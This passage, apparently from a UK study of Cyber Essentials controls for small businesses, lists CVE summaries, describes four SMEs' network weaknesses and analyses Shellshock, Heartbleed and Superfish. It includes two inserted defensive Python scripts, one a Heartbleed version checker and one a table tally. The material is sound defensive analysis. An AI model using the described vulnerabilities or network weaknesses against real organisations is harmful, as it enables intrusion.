CVE-2014-4100: Microsoft Internet Explorer 6 through 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2014-2799, CVE-2014-4059, CVE-2014-4065, CVE-2014-4079, CVE-2014-4081, CVE-2014-4083, CVE-2014-4085, CVE-2014-4088, CVE-2014-4090, CVE-2014-4094, CVE-2014-4097, CVE-2014-4103, CVE-2014-4104, CVE-2014-4105, CVE-2014-4106, CVE-2014-4107, CVE-2014-4108, CVE-2014-4109, CVE-2014-4110, and CVE-2014-4111.

CVE-2014-4105: Microsoft Internet Explorer 6 through 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2014-2799, CVE-2014-4059, CVE-2014-4065, CVE-2014-4079, CVE-2014-4081, CVE-2014-4083, CVE-2014-4085, CVE-2014-4088, CVE-2014-4090, CVE-2014-4094, CVE-2014-4097, CVE-2014-4100, CVE-2014-4103, CVE-2014-4104, CVE-2014-4106, CVE-2014-4107, CVE-2014-4108, CVE-2014-4109, CVE-2014-4110, and CVE-2014-4111.

CVE-2014-4114: Microsoft Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows 8.1, Windows Server 2012 Gold and R2, and Windows RT Gold and 8.1 allow remote attackers to execute arbitrary code via a crafted OLE object in an Office document, as exploited in the wild with a "Sandworm" attack in June through October 2014, aka "Windows OLE Remote Code Execution Vulnerability."

CVE-2014-4127: Microsoft Internet Explorer 6 through 10 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability."

CVE-2014-4130: Microsoft Internet Explorer 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2014-4132 and CVE-2014-4138.

CVE-2014-4132: Microsoft Internet Explorer 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2014-4130 and CVE-2014-4138.

CVE-2014-4133: Microsoft Internet Explorer 6 and 7 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2014-4137.

CVE-2014-4141: Microsoft Internet Explorer 8 through 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability."

CVE-2014-4481: Integer overflow in CoreGraphics in Apple iOS before 8.1.3, Apple OS X before 10.10.2, and Apple TV before 7.0.3 allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via a crafted PDF document.

CVE-2014-4617: The do_uncompress function in g10/compress.c in GnuPG 1.x before 1.4.17 and 2.x before 2.0.24 allows context-dependent attackers to cause a denial of service (infinite loop) via malformed compressed packets, as demonstrated by an a3 01 5b ff byte sequence.

CVE-2014-4631: RSA Adaptive Authentication (On-Premise) 6.0.2.1 through 7.1 P3, when using device binding in a Challenge SOAP call or using the RSA Adaptive Authentication Integration Adapters with Out-of-Band Phone (Authentify) functionality, conducts permanent device binding even when authentication fails, which allows remote attackers to bypass authentication.

CVE-2014-5528: The Appsflyer library for Android does not verify X.509 certificates from SSL servers, which allows man-in-the-middle attackers to spoof servers and obtain sensitive information via a crafted certificate.

CVE-2014-6040: GNU C Library (aka glibc) before 2.20 allows context-dependent attackers to cause a denial of service (out-of-bounds read and crash) via a multibyte character value of "0xffff" to the iconv function when converting (1) IBM933, (2) IBM935, (3) IBM937, (4) IBM939, or (5) IBM1364 encoded data to UTF-8.

CVE-2014-6105: IBM Security Identity Manager 6.x before 6.0.0.3 IF14 allows remote attackers to conduct clickjacking attacks via unspecified vectors.

CVE-2014-6136: IBM Security AppScan Standard 8.x and 9.x before 9.0.1.1 FP1 supports unencrypted sessions, which allows remote attackers to obtain sensitive information by sniffing the network.

CVE-2014-6164: IBM WebSphere Application Server 8.0.x before 8.0.0.10 and 8.5.x before 8.5.5.4 allows remote attackers to spoof OpenID and OpenID Connect cookies and consequently obtain sensitive information via a crafted URL.

CVE-2014-6363: vbscript.dll in Microsoft VBScript 5.6 through 5.8, as used with Internet Explorer 6 through 11 and other products, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "VBScript Memory Corruption Vulnerability."

CVE-2014-6369: Microsoft Internet Explorer 9 through 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability."

CVE-2014-6378: Juniper Junos 11.4 before R12-S4, 12.1X44 before D35, 12.1X45 before D30, 12.1X46 before D25, 12.1X47 before D10, 12.2 before R9, 12.2X50 before D70, 12.3 before R7, 13.1 before R4 before S3, 13.1X49 before D55, 13.1X50 before D30, 13.2 before R5, 13.2X50 before D20, 13.2X51 before D26 and D30, 13.2X52 before D15, 13.3 before R3, and 14.1 before R1 allows remote attackers to cause a denial of service (router protocol daemon crash) via a crafted RSVP PATH message.

CVE-2014-6487: Unspecified vulnerability in the Oracle Identity Manager component in Oracle Fusion Middleware 11.1.1.5, 11.1.1.7, 11.1.2.1, and 11.1.2.2 allows remote authenticated users to affect integrity via unknown vectors related to End User Self Service.

CVE-2014-7250: The TCP stack in 4.3BSD Net/2, as used in FreeBSD 5.4, NetBSD possibly 2.0, and OpenBSD possibly 3.6, does not properly implement the session timer, which allows remote attackers to cause a denial of service (resource consumption) via crafted packets.

CVE-2014-7927: The SimplifiedLowering::DoLoadBuffer function in compiler/simplified-lowering.cc in Google V8, as used in Google Chrome before 40.0.2214.91, does not properly choose an integer data type, which allows remote attackers to cause a denial of service (memory corruption) or possibly have unspecified other impact via crafted JavaScript code.

CVE-2014-7945: OpenJPEG before r2908, as used in PDFium in Google Chrome before 40.0.2214.91, allows remote attackers to cause a denial of service (out-of-bounds read) via a crafted PDF document, related to j2k.c, jp2.c, and t2.c.

CVE-2014-8447: Adobe Reader and Acrobat 10.x before 10.1.13 and 11.x before 11.0.10 on Windows and OS X allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2014-8445, CVE-2014-8446, CVE-2014-8456, CVE-2014-8458, CVE-2014-8459, CVE-2014-8461, and CVE-2014-9158.

CVE-2014-8638: The navigator.sendBeacon implementation in Mozilla Firefox before 35.0, Firefox ESR 31.x before 31.4, Thunderbird before 31.4, and SeaMonkey before 2.32 omits the CORS Origin header, which allows remote attackers to bypass intended CORS access-control checks and conduct cross-site request forgery (CSRF) attacks via a crafted web site.

CVE-2014-8835: The xpc_data_get_bytes function in libxpc in Apple OS X before 10.10.2 does not verify that a dictionary's Attributes key has the xpc_data data type, which allows attackers to execute arbitrary code by providing a crafted dictionary to sysmond, related to an "XPC type confusion" issue.

CVE-2014-9159: Heap-based buffer overflow in Adobe Reader and Acrobat 10.x before 10.1.13 and 11.x before 11.0.10 on Windows and OS X allows attackers to execute arbitrary code via unspecified vectors, a different vulnerability than CVE-2014-8457 and CVE-2014-8460.

CVE-2014-9163: Stack-based buffer overflow in Adobe Flash Player before 13.0.0.259 and 14.x and 15.x before 15.0.0.246 on Windows and OS X and before 11.2.202.425 on Linux allows attackers to execute arbitrary code via unspecified vectors, as exploited in the wild in December 2014.

CVE-2014-9350: TP-Link TL-WR740N 4 with firmware 3.17.0 Build 140520, 3.16.6 Build 130529, and 3.16.4 Build 130205 allows remote attackers to cause a denial of service (httpd crash) via vectors involving a "new" value in the isNew parameter to PingIframeRpm.htm.

CVE-2014-9357: Docker 1.3.2 allows remote attackers to execute arbitrary code with root privileges via a crafted (1) image or (2) build in a Dockerfile in an LZMA (.xz) archive, related to the chroot for archive extraction.


Survey Responses


User Access: Employees are permitted to access the internet from both their individual workstations and additional devices such as smart phones (although technically this is not permitted by policy, the policy is not strictly enforced). Internet access is, however, slightly filtered, with access to Facebook being blocked by the router.

Access logs for any network operations are not created, and any machine in the office can access the network, with no isolated islands.

User accounts can be migrated between machines via a Domain Controller, but in practice this is unlikely to actually happen, with users generally using their own machines.

Operating systems: Locally everything is Windows 7; the remote site uses Windows 7; 2 remote machines are Windows 8.1.

Mitigation of applicable vulnerabilities: Of the 200 listed vulnerabilities, 119 were applicable to the first SME network.

Figure 6: SME-1 Vulnerability Mitigation

Because much of this SME's operations are done via browser-based interfaces to other financial companies (such as banks), it places them in the firing line for a large number of the browser-based attacks. Furthermore, as some banks require specific browser versions for their interfaces to work, they end up with several different browsers, with several versions of each, to cover all their requirements, opening them up multiple times to browser-based vectors.

Additionally, the heavy use of SSL-based communication places them in a position where any SSL vulnerabilities affect them too.

SME Network Two - Specialist Group

Physical Infrastructure: The second SME participant employs 20-25 staff, based across multiple offices in one building.

Employees may bring their own devices or use a workstation provided. Workstations are connected to one of four switches via Ethernet and share a virtual LAN with other employee devices. An off-site server containing sensitive data is accessible only to administrators via SSH.

Network Equipment includes an external Dell PowerEdge Server, four TP-Link Switch Access Points and a TP-Link DHCP Router.

Figure 7: SME-2 Network

Services: Employee devices sharing the network can use Windows Folder Sharing. Employee devices run OS X, Windows XP, Windows 7 & Windows 8, with auto-updates enabled.

Some employees use a VPN to connect to another network for a data service. All other services are provided by cloud servers via HTTPS: Email, Files & Database, as well as management tools; these are used daily.

User Access: Employees have no restriction on their internet access and may use their own equipment. Administrators often access a remote server database and file store acting as a web server. Guests may access a separate Wi-Fi network through the same access points as other office workers, but do not share the same virtual LAN as employees. Wi-Fi access logs are gathered, but no other user activity is logged. Employees can access the network from any machine, but the SME's policy is that all machines should have anti-malware and strong passwords, which are recommended to be changed periodically, with the employee machines configured to automatically lock after a period of inactivity.

Mitigation of applicable vulnerabilities: Of the 200 listed vulnerabilities, 79 were applicable to the second SME network.

Figure 8: SME-2 Vulnerability Mitigation

The specialist SME had the fewest overall potential vulnerabilities, largely owed to a higher reliance on cloud-based services. Although this reduces the risk from inherent vulnerability in a network, responsibility is handed on to the service provider chosen. A certified and reputable cloud services provider should thus be sought to ensure protection through the entire chain.

SME Network Three - Web Development

Physical Infrastructure: SME-3 employs 10 workers based in one building.

Employees are restricted from using their own devices unless the device is validated by the company head, in which case no others may share that device. Workstations are connected to one switch via Ethernet and share a virtual LAN with other employee devices.

Network Equipment includes an external Dell PowerEdge Server, one TP-Link Switch Access Point and a TP-Link DHCP Router.

Figure 9: SME-3 Network

Services: Employee devices sharing the network can use Windows Folder Sharing. Employee devices run OS X, Windows 7 & Windows 8, with auto-updates enabled.

All services are provided by cloud servers via HTTPS: Email, Files & Database, as well as management tools; these are used daily.

User Access: Employees have no restriction on their internet access and commonly use all major browsers for compatibility testing.

Guests are not permitted on the network, but may join a 'guest' network through the same access points with a mobile device. Wi-Fi logs and Cloud Service Access logs are gathered and actively monitored. Employees can access the network from a validated machine, but the SME's policy is that all machines should have anti-malware and strong passwords, which are recommended to be changed periodically, with the employee machines configured to automatically lock after a period of inactivity.

Mitigation of applicable vulnerabilities: Of the 200 listed vulnerabilities, 116 were applicable to the second SME network.

Figure 10: SME-3 Vulnerability Mitigation

The requirement for web development SMEs to operate across multiple web browsers, on various versions, to test and build a customer's website means that the network accumulates all vulnerabilities in web browsers. As this is a specialist case, a recommendation for web development organisations could be to use one up-to-date browser for general use. A bespoke policy may then be put in place.

When working on alternative browsers, employees should only access client pages where the developer has control of the web content.

SME Network Four - Hotel Services

Figure 11: SME-4 Network

Physical Infrastructure: This company is located at a single site and has equipment composed of a single desktop PC and 2 company laptops running on an ADSL router; this same router also provides the internet connection for the guests. An alternative router is available as a manual fall-back connection to the internet, but is available only to company equipment.

The guest network is split from the office network through secondary access point names, filtering traffic into a separate VLAN internal to the router.

Services: No local servers are present to provide any service to employees or guests on the network.

File storage is provided through on-line services including Dropbox and Skydrive. A standalone web server, owned and managed externally, runs the company website, and bookings are managed via a globally accessible website.

All the services are accessed with SSL-secured connections (HTTPS mainly).

User Access: User access is not mediated in any way, and any site can be accessed from any computer. Guests have no restrictions placed on their network usage either.

Operating systems: The company uses iOS for their mobile devices and Windows 8.1 for the office desktop and laptop PCs. Guests can bring their own equipment, so there will be a mix of all operating systems currently available, including Windows, Linux, Mac and others.

Existing Security Measures: Beyond the router's separation between the guest and office networks, no other network security measures are in place. The office PCs do have automatic patch installation configured, however, and have the Kaspersky antivirus suite installed.

Mitigation of applicable vulnerabilities: Of the 200 listed vulnerabilities, 103 were applicable to the second SME network.

Figure 12: SME-4 Vulnerability Mitigation

Similarly to SME 1, SME 4 requires the use of web browsers for bookings and reception of guests, so enables a wide variety of attack vectors through the web.

Thankfully, the services and servers they connect to are run by larger corporations, which will hopefully have implemented at least Cyber Essentials-grade security and protection, so the actual risks should be minimal.

For the purposes of this report, however, we assume that if this company has not implemented Cyber Essentials then the services they use must also not have, leaving them open to attack.

Survey Responses

Data gathered from survey responses affords a much broader look at the typical network deployments and practice in SMEs. The full results from 17 participants may be found in the Survey Responses section on page 27.

Physical Infrastructure: The majority of respondents belong to SMEs with 0-9 workstations on site; this is related to the size of an organisation, and could be considered representative of businesses across the UK.

Services: Local - File, Email, Database and Domain Servers are the most common local service providers, all present in more than 1/3rd of SMEs. Remote - Email, web hosting and file-sharing are the most common services provided remotely.

User Access: More than half of SMEs permit employees' own devices to be used in the workplace; for organisations such as these it is important to ensure that employee machines receive the same level of protection as the rest of the work network, as one vulnerable machine allows vulnerability into the whole company.

Existing Security Measures: Of the survey respondents, most SMEs have a firewall, password policy and data-loss prevention scheme in place. These are the most common security measures in place for the SMEs contacted; below these come access control, malware protection and finally patch management, which is present in a little over half of organisations.

Almost two-thirds of survey participants were previously aware of Cyber Essentials.

Survey Respondents Network

The network built from Survey Respondents' data considers the overall response in order to build a network easily adaptable to match that of the majority of SME network configurations.

Locally, Email and File servers have been represented, with domain controller capabilities represented in a network ADSL Router. Remotely, a web server is depicted, but remote services may also include database usage, email and other web services.

Figure 13: Adaptable Survey-Response Network

Typicality of Case-Study SMEs

Within the Survey Respondents' network, aspects of each of the interviewed SME networks are apparent.

The Finance SME network shares a local file server, as sensitive information needs to be kept and processed by the organisation. Any SME handling sensitive information will be likely to strongly consider using local file servers.

The Specialist SME shares with the survey respondents' data its use of SSH to connect remotely to services. SSH is an important tool for accessing sensitive data while at home, or data that is stored remotely, from the workplace.

The Web Development SME requires employees to connect to many web servers remotely; the survey respondents match this case with the use of external web-hosting services. That being said, in the general case this server is more likely to be the SME's own web-hosting solution rather than a client's.

The Hotel Services SME represents a very basic local network, using only cloud-based services remotely. This is becoming an increasingly popular trend for SMEs, as cloud services are often easier to set up and cheaper to maintain. This is also representative of many SMEs with little-to-no online presence.

Analysis of Cyber Essentials on High Profile Vulnerabilities

The following sections detail three of the high-profile vulnerabilities to hit the popular media in late 2014 to early 2015.

These are of particular note as, while they may not be the most damaging of attack vectors (although some are very serious), they have caught the attention of the public, and SMEs would be under pressure to ensure that they were protected.

With this in mind, we analyse how effective the Cyber Essentials security controls are at tackling these high-profile vulnerabilities.

"ShellShock"

Also known by the name "BashDoor", Shellshock hit the news as it attacked the Linux server environment, and did so in a particularly effective manner.

GNU Bash through 4.3 processes trailing strings after function definitions in the values of environment variables, which allows remote attackers to execute arbitrary code via a crafted environment, as demonstrated by vectors involving the ForceCommand feature in OpenSSH sshd, the mod_cgi and mod_cgid modules in the Apache HTTP Server, scripts executed by unspecified DHCP clients, and other situations in which setting the environment occurs across a privilege boundary from Bash execution, aka "ShellShock." NOTE: the original fix for this issue was incorrect; CVE-2014-7169 has been assigned to cover the vulnerability that is still present after the incorrect fix.

CVE-2014-6271 [13]

The exploit allowed attackers to directly execute arbitrary shell commands on a compromised system by altering environment variables. However, the bug was not enough by itself to actually enable attackers to compromise a system, but allowed access via other services. While the exploit is only effective if the bash environment can be altered, the results can be devastating, as it lays bare the entire system to many other forms of attack.

The threat was particularly insidious for SMEs who used Linux/Unix-based servers for services, mail servers as an example, as they would potentially have no idea that they had been compromised.

“Heartbleed”

Appearing in April 2014, the CVE-2014-0160 (aka “Heartbleed”) bug allowed attackers to directly read the active memory of a target machine through a buffer over-read. This then allowed attackers to access private credentials (or indeed anything else) in the RAM of the target.

As described in the original CVE report:

    The (1) TLS and (2) DTLS implementations in OpenSSL 1.0.1 before 1.0.1g do not properly handle Heartbeat Extension packets, which allows remote attackers to obtain sensitive information from process memory via crafted packets that trigger a buffer over-read, as demonstrated by reading private keys, related to d1_both.c and t1_lib.c, aka the Heartbleed bug.

    CVE-2014-0160 [12]

As OpenSSL is a core part of many applications and services, both in the open and closed source world, this vulnerability had the potential to damage a huge number of systems. At the time of release, various sources (including, for example, Netcraft [15]) reported that up to 17% of trusted SSL-certified servers were vulnerable to the attack.

Depending on how the SME in question operates, the threat this particular CVE posed (and indeed still poses, with as-yet-unpatched servers still online with the vulnerability) is difficult to discern. Obviously the vulnerability is serious, but the ability of individual SMEs to detect and correct this flaw will vary greatly depending on the individual deployments.

Larger companies with their own Linux/Unix servers may have been able to deploy the patched OpenSSL version as soon as the patch was available, but smaller businesses, or those with more cloud-based services, may not have access to the software running on the servers they use and may be at the mercy of the respective operators to implement the fix. Because of this, patch management only partially remedies this vulnerability, and other protection methods from the Cyber Essentials guidelines, such as securing configurations or controlling access, will have unknown effects.

It is vulnerabilities such as this that pose the greatest threat to SME networks, as the methods to fix the issue are often outside the control of the company, potentially leaving them vulnerable far longer than one would expect.
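As an added illustration that is not part of the original report, the affected range quoted from the CVE (OpenSSL 1.0.1 up to, but not including, 1.0.1g) can be turned into a simple inventory check: the script below parses the banner printed by `openssl version` on each host and sorts hosts into vulnerable, clean and unknown. The host names and banners are constructed for the example. Because several Linux distributions backported the fix without changing the version letter, a match here is a prompt to check the vendor's advisory or package changelog, not a final verdict, which is exactly the patch-management gap the paragraphs above describe.

```python
import re

# First two tokens of an `openssl version` banner, e.g. "OpenSSL 1.0.1e 11 Feb 2013":
# major.minor.patch followed by an optional lowercase letter suffix.
_VERSION_RE = re.compile(r"OpenSSL\s+(\d+)\.(\d+)\.(\d+)([a-z]*)")


def parse_openssl_version(banner):
    """Return (major, minor, patch, letter) from a banner, or None if unparsable."""
    m = _VERSION_RE.search(banner)
    if not m:
        return None
    major, minor, patch, letter = m.groups()
    return (int(major), int(minor), int(patch), letter)


def heartbleed_affected(banner):
    """True when the banner lies in the range quoted in CVE-2014-0160:
    OpenSSL 1.0.1 before 1.0.1g. The 1.0.0 and 0.9.8 branches never carried
    the Heartbeat code and the 1.0.2 release shipped with the fix, so any other
    branch is reported as unaffected. Returns None for input it cannot read."""
    v = parse_openssl_version(banner)
    if v is None:
        return None
    major, minor, patch, letter = v
    if (major, minor, patch) != (1, 0, 1):
        return False
    # Patch letters sort alphabetically: "" (plain 1.0.1) < "a" < ... < "f" < "g".
    return letter < "g"


def triage(inventory):
    """Split a mapping of host -> banner into vulnerable / clean / unknown lists."""
    buckets = {"vulnerable": [], "clean": [], "unknown": []}
    for host, banner in inventory.items():
        verdict = heartbleed_affected(banner)
        key = "unknown" if verdict is None else ("vulnerable" if verdict else "clean")
        buckets[key].append(host)
    return buckets


# Constructed sample inventory: host names and banners are made up for this example.
SAMPLE_INVENTORY = {
    "mail.example.test": "OpenSSL 1.0.1e 11 Feb 2013",
    "web.example.test": "OpenSSL 1.0.1g 7 Apr 2014",
    "legacy.example.test": "OpenSSL 1.0.0l 6 Jan 2014",
    "new.example.test": "OpenSSL 1.0.2 22 Jan 2015",
    "appliance.example.test": "version: unavailable",
}

if __name__ == "__main__":
    for bucket, hosts in triage(SAMPLE_INVENTORY).items():
        print(f"{bucket:<10} {', '.join(hosts) or '-'}")
```

Run as a script it prints the three buckets. The parser deliberately returns None rather than guessing for banners it cannot read, so appliances and cloud services whose software cannot be inspected stay in the "unknown" bucket instead of being silently counted as clean, mirroring the report's point that SMEs 3 and 4 cannot determine their own exposure.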

“Superfish”

    The SDK for Komodia Redirector with SSL Digestor, as used in Lavasoft Ad-Aware Web Companion 1.1.885.1766 and Ad-Aware AdBlocker (alpha) 1.3.69.1, Qustodio for Windows, Atom Security, Inc. StaffCop 5.8, and other products, uses the same X.509 certificate private key for a root CA certificate across different customers' installations, which makes it easier for man-in-the-middle attackers to spoof SSL servers by leveraging knowledge of this key, as originally reported for Superfish VisualDiscovery on certain Lenovo Notebook laptop products.

    CVE-2015-2077 [14]

This vulnerability is particularly interesting, as the software causing the issue was effectively brokered by a trusted hardware vendor, namely Lenovo. Because the issue was part of the ‘normal configuration’ for the equipment, it remained undetected for a long time, and hints that there may be further breaches in security, as yet undiscovered, in both Lenovo's and other manufacturers' equipment.

The vector is through the SuperFish software, which essentially breaks the chain of trust for SSL certificates by installing a self-signing certificate into the list of trusted certificates on the host machine. This allows an attacker to simply sign their own code via the same certificate, which itself can be easily gathered from any other machine running SuperFish, and they then have full access to any SSL-secured connection from the target machine.

Thankfully, while the risk to users and SMEs was high, the fix is a simple one-time run of a removal tool provided by Lenovo themselves [11], and it is mitigated fully through the Cyber Essentials patch management advice.

Threat Analysis

ShellShock: Without Cyber Essentials in place, SMEs 1 and 2 would be at risk from ‘Shellshock’, as they both operate Unix/Linux-based systems that would require patching to plug the security issue. The extent to which SMEs 3 and 4 are vulnerable to this issue is unclear, as their large dependency on outside service providers leaves them in a position where they are both unable to determine their vulnerability and unable to remedy it.

With Cyber Essentials, SMEs 1 and 2 would be fully protected, and it is likely that SMEs 3 and 4 are also protected if the external providers also use Cyber Essentials or other security and patching schemes.

Heartbleed: The ‘Heartbleed’ bug is another vulnerability that, without the Cyber Essentials guidelines being followed, would have laid companies' external-facing services open to malicious attackers.

In all cases, however, each SME can be fully protected with a combination of patch management, firewalling and the application of access controls from the Cyber Essentials guidelines.

SuperFish: All of the SMEs we interviewed could be exceedingly vulnerable to the ‘Superfish’ issue without Cyber Essentials, as much of their operations revolve around SSL-encrypted communications. A break in the chain of trust for their certificates would allow an attacker to man-in-the-middle their communications.

Normal system updates would have failed to remedy the situation, as the fix provided by Lenovo consisted of a tool to be run in addition to the normal operating system patches. It is further debatable how effective Cyber Essentials patch management would have been in plugging this vulnerability, as it would require that the administrators be aware of the issue and know of the patch, rather than simply following ‘normal’ patching guidelines. Assuming that the persons responsible for the equipment are aware of the issue, however, Cyber Essentials patch management fully mitigates this issue.


Conclusions

The Cyber Essentials security tools have been shown to mitigate, or to mitigate as soon as a patch is released, all vulnerabilities from remote attackers that do not exploit fundamentally insecure software or hardware. Of the two hundred vulnerabilities collected, eight exploits could not be resolved with the deployment of security patches; for vulnerabilities such as these, the only mitigation available is simply not to install the compromised systems. To help prevent deployments being susceptible to attacks on faulty systems, it may be recommended that a blacklist of such items is composed for public reference.

Scope: It is important to consider that the scope of this study covers only internet-based, commodity-level attacks, and although the Cyber Essentials tools perform very well in mitigating these, they do not represent full security. There is an increasingly identified risk from insiders that also requires attention, not least malicious acts but also users unknowingly compromising security.

The SMEs interviewed represent organisations from a range of market sectors: web development and online presence, specialist scientific services, the hospitality industry and finance.

Additional Tools

The 10 Steps to Cyber Security [2] identifies additional security measures that support the Cyber Essentials Scheme well, delivering additional security through indirect measures such as User Education and Awareness, along with Network and Systems Monitoring. These additional measures would serve to bolster cyber security by fortifying each employee of the SME with the necessary knowledge of safe practice, its importance and some basic technical understanding, just as they may be versed in environmental awareness. Network and Systems Monitoring allows remote user logins, as well as file access and activity, to be logged. For very small networks this may currently be infeasible, as the extra manpower or finances required for such a system are costly. However, for large organisations, additional monitoring capability should be explored as a future extension to Cyber Essentials, not just to identify and mitigate malicious action from more bespoke and sophisticated attacks than those reported on, but also to aid in providing evidence for any potential cyber-crime investigations.

There exist some collective approaches to improving cyber security; a notable example is the Cyber-security Information Sharing Partnership (CiSP) [4]. The partnership aims to benefit all members by providing real-time updates on issues of cyber security and discovered vulnerabilities, as well as best-practice guides and other cyber-threat information. It would be beneficial for more organisations to belong to cyber-security collectives like this, creating networks of informed individuals working together to tackle cyber-crime. This would be particularly useful in quickly identifying potential vulnerabilities and possible patches, which, as shown in this report, is critical for the CE patch management security control to fully mitigate related vulnerabilities.

An important note to be made is toward the security of business affiliates and service providers. Even if an SME has Cyber Essentials in place, any use of cloud services relies on the vendor's security controls for threat mitigation. In other words, cloud email, accounting and any other cloud-based or remote services are only as secure as the service provider makes them. In general, cloud providers should be holding a high level of scrutiny to their security practice and should be encouraged to certify their protection. Hewlett-Packard (HP) has taken this further and has begun to strengthen its entire supply chain (600 SMEs) with the Cyber Essentials accreditation. This provides protection across the entirety of Hewlett-Packard's operations as well as its affiliates. This should be a goal for organisations of all sizes, minimising the risk from cyber-threats by ensuring all trading partners uphold the same high levels of security.

Cyber Essentials Controls

Of the five current Cyber Essentials controls, Patch Management was considered to aid in the mitigation of the highest proportion of remote attacks (87.5%); counter-intuitively, the survey responses had patch management ranked last in use for SMEs. The most commonly used controls could be seen as those providing the most intuitive or easily understood protection: data loss prevention, strong passwords and firewalls, whereas patch management isn't necessarily understood by individuals as a tool that greatly improves cyber security.

Anti-Malware was useful in mitigating the fewest (10%) vulnerabilities. It is, however, important to note that Anti-Malware is largely the only security tool that may routinely scan the network hardware and software, as well as any items downloaded from the internet or received as email attachments. This serves as a last line of defence and, as such, is vital to an organisation's cyber-safety.
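To make proportions of this kind reproducible, here is an added example that is not part of the report. It reads rows in the layout of the appendix table (CVE; applicability to SME 1 to 4 and the idealised profile; outcome without CE; outcome with CE plus the contributing controls) and counts how often each control contributes to a mitigation. The eight rows are copied from the appendix table; the comma-separated control lists are this example's own formatting of those cells, and the choice of denominator (rows that CE mitigates at least partially) is an assumption of the example, so the percentages describe this sample rather than reproduce the 87.5% and 10% figures above.

```python
import re
from collections import Counter

# Column layout of the appendix table ("Cyber Controls Applicability"):
# CVE | SME1 | SME2 | SME3 | SME4 | Idealised | No CE | With CE
COLUMNS = ["CVE", "SME1", "SME2", "SME3", "SME4", "Idealised", "No CE", "With CE"]
FLAG_COLUMNS = COLUMNS[1:6]
_QUALIFIER = re.compile(r"\s*\(.*?\)\s*$")   # strips "(Secure Browser)" etc.


def parse_row(line):
    """Parse one pipe-separated table row into a dict.
    The 'With CE' cell has the form 'Status - Control, Control, ...'."""
    cells = [c.strip() for c in line.split("|")]
    if len(cells) != len(COLUMNS):
        raise ValueError(f"expected {len(COLUMNS)} cells, got {len(cells)}: {line!r}")
    status, _, controls = cells[7].partition(" - ")
    return {
        "cve": cells[0],
        "applies": {col: cells[i + 1] == "y" for i, col in enumerate(FLAG_COLUMNS)},
        "no_ce": cells[6],
        "with_ce": status.strip(),
        # Qualifiers such as "(User Policy)" are dropped so that variants of one
        # control are counted together.
        "controls": [_QUALIFIER.sub("", c).strip() for c in controls.split(",") if c.strip()],
    }


def parse_table(text):
    return [parse_row(line) for line in text.strip().splitlines() if line.strip()]


def status_counts(rows):
    """How many CVEs end up Mitigated / Partially Mitigated / Not Mitigated with CE."""
    return Counter(r["with_ce"] for r in rows)


def control_coverage_percent(rows):
    """Share (percent, 1 dp) of CVEs that CE mitigates at least partially in which
    each control contributes. Assumption of this example: the denominator is the
    number of rows whose 'With CE' status is anything but 'Not Mitigated'."""
    helped = [r for r in rows if r["with_ce"] != "Not Mitigated"]
    counts = Counter(c for r in helped for c in set(r["controls"]))
    return {c: round(100.0 * n / len(helped), 1) for c, n in counts.items()}


def applicability_counts(rows):
    """How many sampled CVEs apply to each profile (a 'y' in its column)."""
    return {col: sum(1 for r in rows if r["applies"][col]) for col in FLAG_COLUMNS}


# Eight rows copied from the report's appendix table; the comma-separated control
# lists are this example's formatting of the original cells.
SAMPLE_ROWS = """
CVE-2013-0008 | y | y | y | y | y | Not Mitigated | Mitigated - Firewall, Secure Configuration (User Policy), Anti-Malware
CVE-2013-0022 | y | n | y | y | n | Not Mitigated | Mitigated - Patch Management, Secure Configuration (Secure Browser), Website Blacklisting
CVE-2013-0140 | y | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management
CVE-2013-1140 | n | n | n | n | n | Not Mitigated | Not Mitigated - Secure Configuration (Don't install)
CVE-2013-1700 | y | y | y | y | y | Not Mitigated | Mitigated - Firewall, Secure Configuration, Patch Management, Anti-Malware
CVE-2014-0160 | y | y | y | y | y | Not Mitigated | Partially Mitigated - Patch Management
CVE-2013-3632 | y | y | y | n | n | Not Mitigated | Mitigated - Access Policy (Strong Password), Firewall
CVE-2013-5507 | n | n | n | n | n | Not Mitigated | Mitigated - Firewall, Patch Management
"""

if __name__ == "__main__":
    rows = parse_table(SAMPLE_ROWS)
    print("with CE:", dict(status_counts(rows)))
    print("applies to:", applicability_counts(rows))
    for control, pct in sorted(control_coverage_percent(rows).items(), key=lambda kv: -kv[1]):
        print(f"{control:<22} {pct:5.1f}%")
```

On this sample Patch Management contributes to 5 of the 7 rows that CE helps with (71.4%), Firewall to 4 and Anti-Malware to 2; the full appendix, fed through the same functions, gives the report-wide figures, and the "Not Mitigated - Secure Configuration (Don't install)" rows are the cases the Conclusions describe as fixable only by not deploying the product.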

Recommendations

To further improve cyber security across the UK, we recommend that:

1. Collective approaches to cyber security should be further encouraged. In particular, a governmental/collective approach to identifying inherently flawed products should be developed. This could be in addition to, or as an extension of, current initiatives like CiSP, which can make a difference in detecting and reacting to potential vulnerabilities in a timely manner.

2. Further research into the mitigation of other cyber-threats is carried out, to explore the risk from insider threats and targeted attacks.

3. Further employee education is strongly encouraged, especially to be able to tackle the other types of attacks mentioned above, which were not within the scope of this report.


References

[1] Centre for the Protection of National Infrastructure, CESG, Cabinet Office, Department for Business, Innovation and Skills. Cyber security guidance for business. https://www.gov.uk/government/publications/cyber-risk-management-a-board-level-responsibility, September 2012.

